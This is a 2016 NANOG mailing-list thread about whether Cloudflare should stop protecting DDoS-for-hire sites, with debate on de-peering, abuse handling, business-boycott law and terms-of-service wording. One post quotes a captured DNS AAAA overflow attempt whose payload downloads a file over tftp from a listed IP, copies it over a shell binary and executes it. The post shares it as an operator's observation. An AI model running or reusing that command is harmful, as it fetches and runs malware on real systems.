While many are chanting: #NetworkLivesMatter, I have yet to see, read, or hear about any network provider being the first to set precedence by either de-peering, or blocking traffic from Cloudflare. There is a lot of keyboard posturing: "I am mad and I am not going to take it anymore" hooplah but no one is lifting a finger to do anything other than regurgitate "I am mad... This is criminal."
(long discussion, was waiting for a place to jump in..)
If we want to be accurate about it, Cloudflare doesn’t host the DDoS, they protect the website of seller of the product. We shouldn’t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
If, on the other hand, you can find a specific network actually generating the volumes of DDoS, you should have a conversation about de-peering….
$0.02…
Agreed. Cloudflare is just the messenger The ddos is coming from your ssdp, dns, and ntp servers. Not Cloudflare. I see a lot of ddos traffic. It is always udp Comcast took a huge step in stemming the ssdp problem in their network, http://labs.comcast.com/preventing-ssdp-abuse Thanks Comcast! But they still host tens of thousands, perhaps more, open dns resolvers that attack us.
On Thu, Jul 28, 2016 at 11:30:12PM +0000, Donn Lasher via NANOG wrote:
If we want to be accurate about it, Cloudflare doesn???t host the DDoS, they protect the website of seller of the product. We shouldn???t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
This strategy fails for two reasons. First, nobody gets a pass. Anybody providing services to abusers needs to cut them off, whether it's a registrar, a web host, an email provider, a DNS provider, or anything else. Nobody gets to shrug it off with "Well, but..." Second, nobody *can* get a pass, because the people behind these operations have long since learned to distribute their assets widely -- in an attempt to avoid exactly the actions in the first point. And you know what? It works. "We're just hosting their email", says X, and "We're just hosting their DNS", says Y, and "We're just hosting their web site", says Z, and none of them do anything, and nothing gets done. The only way to make action against them effective is to do it broadly, do it swiftly, and do it permanently. ---rsk
On Fri, 29 Jul 2016, Rich Kulawiec wrote:
On Thu, Jul 28, 2016 at 11:30:12PM +0000, Donn Lasher via NANOG wrote:
If we want to be accurate about it, Cloudflare doesn???t host the DDoS, they protect the website of seller of the product. We shouldn???t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
The only way to make action against them effective is to do it broadly, do it swiftly, and do it permanently.
In my ramblings on "Why network operators love filth", I associate a landlord that knowingly allows his/her tenant to sell drugs. In America, your house is gone. This should be the case on the Internet as well. Keep sending out crap and ARIN should yank your IP space after everyone else has de-peered you. So let's get to these horrible analogies of "weapons" and whether or not CloudFlare is solely the gun manufacturer and is not responsible whether or not their ARCLOUD rifle was used to shoot up a school killing children. Analogy: Hotel Cloud is a pretty big hotel in the city. They have 5,000 rooms. When you walk by, their tenants are throwing rocks out of the windows, garbage, etc. People complain to the hotel management that does nothing about it. Hotel Cloud's response is: 'Well this is really not our problem, we only rent a room, what the occupant does...' --- And this makes sense to how many of you who'd respond: "Well I don't know about you but I want to walk around freely" Freely? At some point in time, you WILL walk by this hotel, or another that WILL become just like it. Why? Because there will be no one to say: "Hey this is wrong buck stops here..." I have seen these discussions on this list for so many years, and there are those that want to do good, but won't lift a finger out of fear of the herd/praetorian guard. Anyone saying it cannot be done, is a coward bowing to the dollar (euro/yen/whatever). The analogy above is spot on, with the only difference being a hotel is physical, and on the Interwebs, out of sight out of mind. This is until one of your relatives' sites gets taken offline by some bored moron via DDoS, and there go their sales, there goes their business. THEN and only THEN will some of the naysayers say: "Shit we could have stopped it." Do you need law enforcement to be moral? "I can see that person is getting pulverized by some drunken idiot better not intervene because well... I want to walk freely..." That beating can come full circle, where beating can be DDoS, a sophisticated attack, malware. I am so tempted to start a shaming site for networks including all of the big boys with detailed records showing how abuse was contacted, no one did nothing, and oh by the way... "Are you sure you want to host or transit with this company? Last I checked via logs, they were a filthy network that catered to peds, RBN folk, etc" Maybe when some of you guys (that sit around twiddling fingers) see your companies all over the place, maybe then you'll think about doing the right thing. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM "Where ignorance is our master, there is no possibility of real peace" - Dalai Lama 0B23 595C F07C 6092 8AEB 074B FC83 7AF5 9D8A 4463 https://pgp.mit.edu/pks/lookup?op=get&search=0xFC837AF59D8A4463
On Fri 2016-Jul-29 07:50:09 -0500, J. Oquendo <joquendo@e-fensive.net> wrote:
On Fri, 29 Jul 2016, Rich Kulawiec wrote:
On Thu, Jul 28, 2016 at 11:30:12PM +0000, Donn Lasher via NANOG wrote:
If we want to be accurate about it, Cloudflare doesn???t host the DDoS, they protect the website of seller of the product. We shouldn???t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
The only way to make action against them effective is to do it broadly, do it swiftly, and do it permanently.
In my ramblings on "Why network operators love filth", I associate a landlord that knowingly allows his/her tenant to sell drugs. In America, your house is gone. This should be the case on the Internet as well. Keep sending out crap and ARIN should yank your IP space after everyone else has de-peered you.
So let's get to these horrible analogies of "weapons" and whether or not CloudFlare is solely the gun manufacturer and is not responsible whether or not their ARCLOUD rifle was used to shoot up a school killing children.
Analogy: Hotel Cloud is a pretty big hotel in the city. They have 5,000 rooms. When you walk by, their tenants are throwing rocks out of the windows, garbage, etc. People complain to the hotel management that does nothing about it. Hotel Cloud's response is: 'Well this is really not our problem, we only rent a room, what the occupant does...' --- And this makes sense to how many of you who'd respond: "Well I don't know about you but I want to walk around freely" Freely? At some point in time, you WILL walk by this hotel, or another that WILL become just like it. Why? Because there will be no one to say: "Hey this is wrong buck stops here..."
I have seen these discussions on this list for so many years, and there are those that want to do good, but won't lift a finger out of fear of the herd/praetorian guard. Anyone saying it cannot be done, is a coward bowing to the dollar (euro/yen/whatever). The analogy above is spot on...
This may seem pedantic, but no it's not, at least not in the Cloudflare situation. In the Hotel Cloudflare example, the miscreants don't hurl the rocks and filth out of the hotels' windows. They set up a storefront/shop in the hotel to sell rock- and filth-slinging for hire, with the actual rock- and filth-flinging being done elsewhere. That said: I don't believe the hotel can turn a blind eye to rock- and filth-slinging being peddled from their premises without consequence. If we caught someone running a booter web storefront on our net, they'd be gone. And the premises from which rock- and filth-slinging occurs (networks that originate garbage traffic, especially those that permit source address spoofing) also need to be held accountable. Again: not disagreeing that we need to hold people accountable; just clarifying the analogy for this case. I've cut off service for customer gear that was spewing garbage where they failed to do anything about it. We generally give an initial grace period and assist the customer however we can in getting their stuff cleaned up (or try to drop just the abusive traffic to start and leave the rest of their feed). But if you keep getting repeatedly compromised, fail to protect your stuff or clean it up, and keep spewing ever more varied garbage, you've proven yourself incapable of running an Internet-facing service and I'll quit trying to play whack-a-mole and just drop you. And yes: BCP38: we haz it. We're not at the scale of the big boys, but we try to do our part to run a clean shop.
...with the only difference being a hotel is physical, and on the Interwebs, out of sight out of mind.
This is until one of your relatives' sites gets taken offline by some bored moron via DDoS, and there go their sales, there goes their business. THEN and only THEN will some of the naysayers say: "Shit we could have stopped it."
Do you need law enforcement to be moral? "I can see that person is getting pulverized by some drunken idiot better not intervene because well... I want to walk freely..." That beating can come full circle, where beating can be DDoS, a sophisticated attack, malware.
I am so tempted to start a shaming site for networks including all of the big boys with detailed records showing how abuse was contacted, no one did nothing, and oh by the way... "Are you sure you want to host or transit with this company? Last I checked via logs, they were a filthy network that catered to peds, RBN folk, etc" Maybe when some of you guys (that sit around twiddling fingers) see your companies all over the place, maybe then you'll think about doing the right thing.
-- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM
"Where ignorance is our master, there is no possibility of real peace" - Dalai Lama
0B23 595C F07C 6092 8AEB 074B FC83 7AF5 9D8A 4463 https://pgp.mit.edu/pks/lookup?op=get&search=0xFC837AF59D8A4463
-- Hugo Slabbert | email, xmpp/jabber: hugo@slabnet.com pgp key: B178313E | also on Signal
On Fri, 29 Jul 2016 07:50:09 -0500, "J. Oquendo" said:
In my ramblings on "Why network operators love filth", I associate a landlord that knowingly allows his/her tenant to sell drugs. In America, your house is gone. This should be the case on the Internet as well.
Oh, do *NOT* go there. In America, "Civil forfeiture" is a *major* out-of-control problem, because it is *not* done with any sort of judicial review *at all*. The police department simply seizes your house/car/etc on *suspicion* of being involved with drugs or whatever - there doesn't even need to be an arrest of anybody. That's right - they can suspect you of dealing drugs, but not have enough evidence to arrest you. But they can take your car away anyhow. It's called "stop and seize". They can take your car away because you loaned it to your brother-in-law to go shopping, because they suspect *he* deals drugs. The car doesn't have to be involved in travelling to a drug deal. Oh, and in most cases, the police department gets to *keep* the proceeds (money, cars - often sold at auction for more money, etc) of the forfeiture. This of course makes their budget look better. The end result - in the US, in 2014, the police took more money and assets from people than all the reported robberies for the year. http://www.zerohedge.com/news/2015-11-17/police-civil-asset-forfeitures-exce... I sincerely *hope* that isn't how you want a global Internet run.
Unfortunately that raises the issue of what's generally termed in law a "business boycott" which is at least tortiable if not illegal. The grocer can't agree with your landlord not to sell you food until you catch up on the rent. They can agree to use this information to refuse you credit but even that's quite constrained by law even if often done anyhow. And that's a credit relationship so different. I went over this with my attorney when another ISP asked me to shut a customer's account down because they were spamming them from a third ISP's account. I asked to look at the emails (spam) in question and none originated at our site. The acct in question on my site didn't do anything problematic that I could find. My lawyer explained the above to me: You can't do that, business boycott. The other ISP (specifically a sysadmin) who'd asked me to shut the acct got so angry at this response, he took it all very personally and unprofessionally, that I had to bring in his own legal dept to explain this to him which he of course took as a further affront. It got ugly but you don't need the details. That's the problem with all this folksy armchair "law", it's often very bad advice and based on the assumption that the law must agree with one's emotional feelings. Good luck with that. On July 29, 2016 at 08:08 rsk@gsp.org (Rich Kulawiec) wrote:
On Thu, Jul 28, 2016 at 11:30:12PM +0000, Donn Lasher via NANOG wrote:
If we want to be accurate about it, Cloudflare doesn???t host the DDoS, they protect the website of seller of the product. We shouldn???t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
This strategy fails for two reasons.
First, nobody gets a pass. Anybody providing services to abusers needs to cut them off, whether it's a registrar, a web host, an email provider, a DNS provider, or anything else. Nobody gets to shrug it off with "Well, but..."
Second, nobody *can* get a pass, because the people behind these operations have long since learned to distribute their assets widely -- in an attempt to avoid exactly the actions in the first point. And you know what? It works. "We're just hosting their email", says X, and "We're just hosting their DNS", says Y, and "We're just hosting their web site", says Z, and none of them do anything, and nothing gets done.
The only way to make action against them effective is to do it broadly, do it swiftly, and do it permanently.
---rsk
-- -Barry Shein Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
If they are using a website hosted or accelerated by your CDN to advertise an illegal activity or an activity in violation of your ToS, then if you have written your ToS properly, you are free to shut down said site (or at least your portions of it) based on their violation of your ToS. That’s not a business boycott because you didn’t conspire with their other providers to shut it down, you took an independent action based on your own ToS. There’s fairly wide latitude to “reserve the right to refuse service to anyone”, especially if you can show that their use of said service is in violation of the contract(s) applicable to that service. Owen
On Jul 29, 2016, at 12:36 , bzs@theworld.com wrote:
Unfortunately that raises the issue of what's generally termed in law a "business boycott" which is at least tortiable if not illegal.
The grocer can't agree with your landlord not to sell you food until you catch up on the rent.
They can agree to use this information to refuse you credit but even that's quite constrained by law even if often done anyhow. And that's a credit relationship so different.
I went over this with my attorney when another ISP asked me to shut a customer's account down because they were spamming them from a third ISP's account.
I asked to look at the emails (spam) in question and none originated at our site. The acct in question on my site didn't do anything problematic that I could find.
My lawyer explained the above to me: You can't do that, business boycott.
The other ISP (specifically a sysadmin) who'd asked me to shut the acct got so angry at this response, he took it all very personally and unprofessionally, that I had to bring in his own legal dept to explain this to him which he of course took as a further affront. It got ugly but you don't need the details.
That's the problem with all this folksy armchair "law", it's often very bad advice and based on the assumption that the law must agree with one's emotional feelings. Good luck with that.
On July 29, 2016 at 08:08 rsk@gsp.org (Rich Kulawiec) wrote:
On Thu, Jul 28, 2016 at 11:30:12PM +0000, Donn Lasher via NANOG wrote:
If we want to be accurate about it, Cloudflare doesn???t host the DDoS, they protect the website of seller of the product. We shouldn???t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
This strategy fails for two reasons.
First, nobody gets a pass. Anybody providing services to abusers needs to cut them off, whether it's a registrar, a web host, an email provider, a DNS provider, or anything else. Nobody gets to shrug it off with "Well, but..."
Second, nobody *can* get a pass, because the people behind these operations have long since learned to distribute their assets widely -- in an attempt to avoid exactly the actions in the first point. And you know what? It works. "We're just hosting their email", says X, and "We're just hosting their DNS", says Y, and "We're just hosting their web site", says Z, and none of them do anything, and nothing gets done.
The only way to make action against them effective is to do it broadly, do it swiftly, and do it permanently.
---rsk
-- -Barry Shein
Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
On July 30, 2016 at 10:51 owen@delong.com (Owen DeLong) wrote:
If they are using a website hosted or accelerated by your CDN to advertise an illegal activity or an activity in violation of your ToS, then if you have written your ToS properly, you are free to shut down said site (or at least your portions of it) based on their violation of your ToS.
Well, yes, of course, which is why I suggested developing generally agreed upon definitions and writing them into contracts. One can't really write a useful contract if terms aren't well defined.
That’s not a business boycott because you didn’t conspire with their other providers to shut it down, you took an independent action based on your own ToS.
The issue arises if you shut them down when you're not the harmed or involved party. I don't know if one can write a ToS which says you will be shut down if you harm another party utilizing another party's services but not otherwise involving us. Well, you can write anything but is it lawful and enforceable? In some cases where that sort of thing has come up I've turned it into a credit relationship which has greater leeway. Something like: It has come to our attention that you are engaged in activities, even if not thus far involving our services, which might incur us legal fees. Consequently we require a deposit to cover those legal fees, in advance, of $10,000 [pick a number] with the understanding that any such legal fees will be billable in full even if above and beyond that $10,000 deposit. Since I extend you no credit a failure to provide that deposit by [date in the near future] will result in termination of services. Please feel free to contact us with any questions or concerns. but consult your attorney, state and local regulations and your own ToS and corporate organization may affect how and whether you can do that sort of thing or exactly how it has to be architected. If one wants to one can include demand for indemnification with evidence of ability to indemnify and/or business insurance policies where you've been written in as a legitimate potential claimant for legal fees and damages assuming the business insurance policy covers that but as I said you need a lawyer to suss that out. They probably could still fight with you over all that if none of it was anticipated in your ToS (hint: might be something to add to a ToS, reserving the right to...blah blah.) Or even try to perfect an argument based on some theory of estoppel (you changed the conditions in a way which harms me the client.) More likely they'll ask for time and assistance to leave your service (in my experience), generally what you actually wanted. Buh-bye!
There’s fairly wide latitude to “reserve the right to refuse service to anyone”, especially if you can show that their use of said service is in violation of the contract(s) applicable to that service.
Yeah well as any lawyer will tell you relying on broad principles like that rather than specifying covenants is just asking for legal fees :-)
Owen
On Jul 29, 2016, at 12:36 , bzs@theworld.com wrote:
Unfortunately that raises the issue of what's generally termed in law a "business boycott" which is at least tortiable if not illegal.
The grocer can't agree with your landlord not to sell you food until you catch up on the rent.
They can agree to use this information to refuse you credit but even that's quite constrained by law even if often done anyhow. And that's a credit relationship so different.
I went over this with my attorney when another ISP asked me to shut a customer's account down because they were spamming them from a third ISP's account.
I asked to look at the emails (spam) in question and none originated at our site. The acct in question on my site didn't do anything problematic that I could find.
My lawyer explained the above to me: You can't do that, business boycott.
The other ISP (specifically a sysadmin) who'd asked me to shut the acct got so angry at this response, he took it all very personally and unprofessionally, that I had to bring in his own legal dept to explain this to him which he of course took as a further affront. It got ugly but you don't need the details.
That's the problem with all this folksy armchair "law", it's often very bad advice and based on the assumption that the law must agree with one's emotional feelings. Good luck with that.
On July 29, 2016 at 08:08 rsk@gsp.org (Rich Kulawiec) wrote:
On Thu, Jul 28, 2016 at 11:30:12PM +0000, Donn Lasher via NANOG wrote:
If we want to be accurate about it, Cloudflare doesn???t host the DDoS, they protect the website of seller of the product. We shouldn???t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
This strategy fails for two reasons.
First, nobody gets a pass. Anybody providing services to abusers needs to cut them off, whether it's a registrar, a web host, an email provider, a DNS provider, or anything else. Nobody gets to shrug it off with "Well, but..."
Second, nobody *can* get a pass, because the people behind these operations have long since learned to distribute their assets widely -- in an attempt to avoid exactly the actions in the first point. And you know what? It works. "We're just hosting their email", says X, and "We're just hosting their DNS", says Y, and "We're just hosting their web site", says Z, and none of them do anything, and nothing gets done.
The only way to make action against them effective is to do it broadly, do it swiftly, and do it permanently.
---rsk
-- -Barry Shein
Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
-- -Barry Shein Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
This is silly. Anyone is of course allowed to deny service to parties involved in obvious criminal activity. Moreover, Cloudflare benefits from this illegal activity that they allow on their service. In addition most other services disallow the same illegal sites. This can only lead to one conclusion. Regards Baldur Den 30. jul. 2016 21.36 skrev <bzs@theworld.com>:
On July 30, 2016 at 10:51 owen@delong.com (Owen DeLong) wrote:
If they are using a website hosted or accelerated by your CDN to advertise an illegal activity or an activity in violation of your ToS, then if you have written your ToS properly, you are free to shut down said site (or at least your portions of it) based on their violation of your ToS.
Well, yes, of course, which is why I suggested developing generally agreed upon definitions and writing them into contracts.
One can't really write a useful contract if terms aren't well defined.
That’s not a business boycott because you didn’t conspire with their
other
providers to shut it down, you took an independent action based on your own ToS.
The issue arises if you shut them down when you're not the harmed or involved party.
I don't know if one can write a ToS which says you will be shut down if you harm another party utilizing another party's services but not otherwise involving us. Well, you can write anything but is it lawful and enforceable?
In some cases where that sort of thing has come up I've turned it into a credit relationship which has greater leeway.
Something like:
It has come to our attention that you are engaged in activities, even if not thus far involving our services, which might incur us legal fees. Consequently we require a deposit to cover those legal fees, in advance, of $10,000 [pick a number] with the understanding that any such legal fees will be billable in full even if above and beyond that $10,000 deposit. Since I extend you no credit a failure to provide that deposit by [date in the near future] will result in termination of services. Please feel free to contact us with any questions or concerns.
but consult your attorney, state and local regulations and your own ToS and corporate organization may affect how and whether you can do that sort of thing or exactly how it has to be architected.
If one wants to one can include demand for indemnification with evidence of ability to indemnify and/or business insurance policies where you've been written in as a legitimate potential claimant for legal fees and damages assuming the business insurance policy covers that but as I said you need a lawyer to suss that out.
They probably could still fight with you over all that if none of it was anticipated in your ToS (hint: might be something to add to a ToS, reserving the right to...blah blah.) Or even try to perfect an argument based on some theory of estoppel (you changed the conditions in a way which harms me the client.)
More likely they'll ask for time and assistance to leave your service (in my experience), generally what you actually wanted. Buh-bye!
There’s fairly wide latitude to “reserve the right to refuse service to anyone”, especially if you can show that their use of said service is in violation of the contract(s) applicable to that service.
Yeah well as any lawyer will tell you relying on broad principles like that rather than specifying covenants is just asking for legal fees :-)
Owen
On Jul 29, 2016, at 12:36 , bzs@theworld.com wrote:
Unfortunately that raises the issue of what's generally termed in law a "business boycott" which is at least tortiable if not illegal.
The grocer can't agree with your landlord not to sell you food until you catch up on the rent.
They can agree to use this information to refuse you credit but even that's quite constrained by law even if often done anyhow. And that's a credit relationship so different.
I went over this with my attorney when another ISP asked me to shut a customer's account down because they were spamming them from a third ISP's account.
I asked to look at the emails (spam) in question and none originated at our site. The acct in question on my site didn't do anything problematic that I could find.
My lawyer explained the above to me: You can't do that, business boycott.
The other ISP (specifically a sysadmin) who'd asked me to shut the acct got so angry at this response, he took it all very personally and unprofessionally, that I had to bring in his own legal dept to explain this to him which he of course took as a further affront. It got ugly but you don't need the details.
That's the problem with all this folksy armchair "law", it's often very bad advice and based on the assumption that the law must agree with one's emotional feelings. Good luck with that.
On July 29, 2016 at 08:08 rsk@gsp.org (Rich Kulawiec) wrote:
On Thu, Jul 28, 2016 at 11:30:12PM +0000, Donn Lasher via NANOG
wrote:
If we want to be accurate about it, Cloudflare doesn???t host the DDoS, they protect the website of seller of the product. We shouldn???t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
This strategy fails for two reasons.
First, nobody gets a pass. Anybody providing services to abusers needs to cut them off, whether it's a registrar, a web host, an email provider, a DNS provider, or anything else. Nobody gets to shrug it off with "Well, but..."
Second, nobody *can* get a pass, because the people behind these operations have long since learned to distribute their assets widely -- in an attempt to avoid exactly the actions in the first point. And you know what? It works. "We're just hosting their email", says X, and "We're just hosting their DNS", says Y, and "We're just hosting their web site", says Z, and none of them do anything, and nothing gets done.
The only way to make action against them effective is to do it broadly, do it swiftly, and do it permanently.
---rsk
-- -Barry Shein
Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
-- -Barry Shein
Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
On 2016-07-31 05:46, Randy Bush wrote:
This is silly. Anyone is of course allowed to deny service to parties involved in obvious criminal activity. so block cloudflare from your network and go back to work already.
randy
What is that supposed to accomplish? Cloudflare will still be helping selling DDoS attacks on my network. No it is not the same as asking Cloudflare to do the sensible thing: Cloudflare profits on DDoS attacks. We are the victims. Cloudflare can dump just the obvious criminal customers. The ones they got abuse complaints about so they know which ones to look at. If we block Cloudflare there will be collateral damage to all legit Cloudflare customers and our own customers using services from legit Cloudflare customers. Asking me to do anything at all is like telling the rape victim to take care of the problem herself. Cloudflare is the wrongdoing party here, not us. Blocking Cloudflare does not stop the attacks. If Cloudflare stops offering protection service to booters, those sites will find it very hard to find alternatives. There is a reason they all are using Cloudflare. Thus if Cloudflare boots the booters we will very likely see a decrease in attacks. My preferred solution is that management of Cloudflare decides to make their company a honest outfit again. Failing that, I would like law enforcement to coerce them into becoming a honest outfit. Failing that, I would want a judge in a civil lawsuit coerce them. I do believe that most of us on this list have cause to do that civil lawsuit, especially if it was done as a class action. But I just own a small company that is not even based in the US, so I am not going to be the hero that funds it. Instead I will do what I can to warn everyone off this company. Regards, Baldur
so block cloudflare from your network and go back to work already.
What is that supposed to accomplish? Cloudflare will still be helping selling DDoS attacks on my network.
No it is not the same as asking Cloudflare to do the sensible thing:
and how is that working out for you? all that is happening is the subject that won't die is being a dos on this list (yes, including this response) randy
While on that subject, ( And by pure coincidence ) Here is a little attempt of exploiting AAAA overflow (dnsmasq maybe) using OVH as a payload distribution AAAA cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh Obviously that host is not accessible at the moment. (GG OVH?) I'm suspecting that the CC used to create that VM got declined on the 1st, which is often the case for payload distribution. ----- Alain Hebert ahebert@pubnix.net PubNIX Inc. 50 boul. St-Charles P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 On 08/01/16 07:33, Randy Bush wrote:
so block cloudflare from your network and go back to work already. What is that supposed to accomplish? Cloudflare will still be helping selling DDoS attacks on my network.
No it is not the same as asking Cloudflare to do the sensible thing: and how is that working out for you?
all that is happening is the subject that won't die is being a dos on this list (yes, including this response)
randy
On Jul 30, 2016, at 12:34 PM, bzs@theworld.com wrote:
On July 30, 2016 at 10:51 owen@delong.com <mailto:owen@delong.com> (Owen DeLong) wrote:
If they are using a website hosted or accelerated by your CDN to advertise an illegal activity or an activity in violation of your ToS, then if you have written your ToS properly, you are free to shut down said site (or at least your portions of it) based on their violation of your ToS.
Well, yes, of course, which is why I suggested developing generally agreed upon definitions and writing them into contracts.
One can't really write a useful contract if terms aren't well defined.
That’s not a business boycott because you didn’t conspire with their other providers to shut it down, you took an independent action based on your own ToS.
The issue arises if you shut them down when you're not the harmed or involved party.
Not if they are using your service in a way that is contrary to the agreement they have signed.
I don't know if one can write a ToS which says you will be shut down if you harm another party utilizing another party's services but not otherwise involving us. Well, you can write anything but is it lawful and enforceable?
Probably not, but you wouldn’t do that anyway. What you would write instead is that “You shall not use the service to carry out attacks or other malicious activity, nor shall you use the service to advertise, solicit, or contract to carry out such actions even if the actions themselves are carried out independent of the service.” You can, of course, prohibit any action you want on your network, even if the prohibited action isn’t the actual objectionable action.
In some cases where that sort of thing has come up I've turned it into a credit relationship which has greater leeway.
Something like:
It has come to our attention that you are engaged in activities, even if not thus far involving our services, which might incur us legal fees. Consequently we require a deposit to cover those legal fees, in advance, of $10,000 [pick a number] with the understanding that any such legal fees will be billable in full even if above and beyond that $10,000 deposit. Since I extend you no credit a failure to provide that deposit by [date in the near future] will result in termination of services. Please feel free to contact us with any questions or concerns.
Here you risk running up against a claim that this new requirement is a change to the ToS which they haven’t agreed to and which, depending on how well they negotiated the contract may not be enforceable until it comes time for contract renewal and you add this deposit to the terms of the new contract.
but consult your attorney, state and local regulations and your own ToS and corporate organization may affect how and whether you can do that sort of thing or exactly how it has to be architected.
Always.
If one wants to one can include demand for indemnification with evidence of ability to indemnify and/or business insurance policies where you've been written in as a legitimate potential claimant for legal fees and damages assuming the business insurance policy covers that but as I said you need a lawyer to suss that out.
Sure, but it’s questionable whether the aggrieved party has any legitimate claim against the hosting company that merely hosted the site that advertised the DDOS service in question. Much easier to just prohibit advertising such a service in the first place, IMHO.
They probably could still fight with you over all that if none of it was anticipated in your ToS (hint: might be something to add to a ToS, reserving the right to...blah blah.) Or even try to perfect an argument based on some theory of estoppel (you changed the conditions in a way which harms me the client.)
More likely they'll ask for time and assistance to leave your service (in my experience), generally what you actually wanted. Buh-bye!
Yep… Unless they’re starting to run out of options.
There’s fairly wide latitude to “reserve the right to refuse service to anyone”, especially if you can show that their use of said service is in violation of the contract(s) applicable to that service.
Yeah well as any lawyer will tell you relying on broad principles like that rather than specifying covenants is just asking for legal fees :-)
Sure, but my point is that specifically spelling out certain actions that you refuse to provide service to is usually the easiest way to terminate someone for committing such actions on your service. Owen
Owen
On Jul 29, 2016, at 12:36 , bzs@theworld.com wrote:
Unfortunately that raises the issue of what's generally termed in law a "business boycott" which is at least tortiable if not illegal.
The grocer can't agree with your landlord not to sell you food until you catch up on the rent.
They can agree to use this information to refuse you credit but even that's quite constrained by law even if often done anyhow. And that's a credit relationship so different.
I went over this with my attorney when another ISP asked me to shut a customer's account down because they were spamming them from a third ISP's account.
I asked to look at the emails (spam) in question and none originated at our site. The acct in question on my site didn't do anything problematic that I could find.
My lawyer explained the above to me: You can't do that, business boycott.
The other ISP (specifically a sysadmin) who'd asked me to shut the acct got so angry at this response, he took it all very personally and unprofessionally, that I had to bring in his own legal dept to explain this to him which he of course took as a further affront. It got ugly but you don't need the details.
That's the problem with all this folksy armchair "law", it's often very bad advice and based on the assumption that the law must agree with one's emotional feelings. Good luck with that.
On July 29, 2016 at 08:08 rsk@gsp.org (Rich Kulawiec) wrote:
On Thu, Jul 28, 2016 at 11:30:12PM +0000, Donn Lasher via NANOG wrote:
If we want to be accurate about it, Cloudflare doesn???t host the DDoS, they protect the website of seller of the product. We shouldn???t be de-peering Cloud Flare over sites they protect any more than we would de-peer GoDaddy over sites they host, some of which, no doubt, sell gray/black market/illegal items/services.
This strategy fails for two reasons.
First, nobody gets a pass. Anybody providing services to abusers needs to cut them off, whether it's a registrar, a web host, an email provider, a DNS provider, or anything else. Nobody gets to shrug it off with "Well, but..."
Second, nobody *can* get a pass, because the people behind these operations have long since learned to distribute their assets widely -- in an attempt to avoid exactly the actions in the first point. And you know what? It works. "We're just hosting their email", says X, and "We're just hosting their DNS", says Y, and "We're just hosting their web site", says Z, and none of them do anything, and nothing gets done.
The only way to make action against them effective is to do it broadly, do it swiftly, and do it permanently.
---rsk
-- -Barry Shein
Software Tool & Die | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
-- -Barry Shein
Software Tool & Die | bzs@TheWorld.com <mailto:bzs@theworld.com> | http://www.TheWorld.com <http://www.theworld.com/> Purveyors to the Trade | Voice: +1 617-STD-WRLD | 800-THE-WRLD The World: Since 1989 | A Public Information Utility | *oo*
On Sat, Jul 30, 2016 at 03:34:32PM -0400, bzs@theworld.com wrote:
I don't know if one can write a ToS which says you will be shut down if you harm another party utilizing another party's services but not otherwise involving us. Well, you can write anything but is it lawful and enforceable?
Yes. And it doesn't require that the activity be illegal, which is a good thing because of what most of us recognize as abusive may or may not be illegal depending on which legal professional is interpreting the law, which law they're interpreting, and what jurisidction(s) apply. I fired an 11-year customer in under an hour when I discovered them spamming via one of the numerous spammers-for-hire out there. This activity had nothing to do with the services I was providing them, but it fell under the provision that said (abbreviating liberally from the legalese) "if you spam from anywhere, you're toast". I didn't like doing it to a longtime customer, particularly because they happened to be my biggest customer, but I did...because it was the right thing to do, and because I had made it crystal-clear to them when they signed on that I would do it without hesitation. I expect the same from everyone else. If I can do it without the budgets, staff, and legal departments that so many far larger operations enjoy, then so can they. It's just a question of whether or not they recognize their ethical, professional obligation to the rest of the Internet and are willing to put that ahead of profit. ---rsk
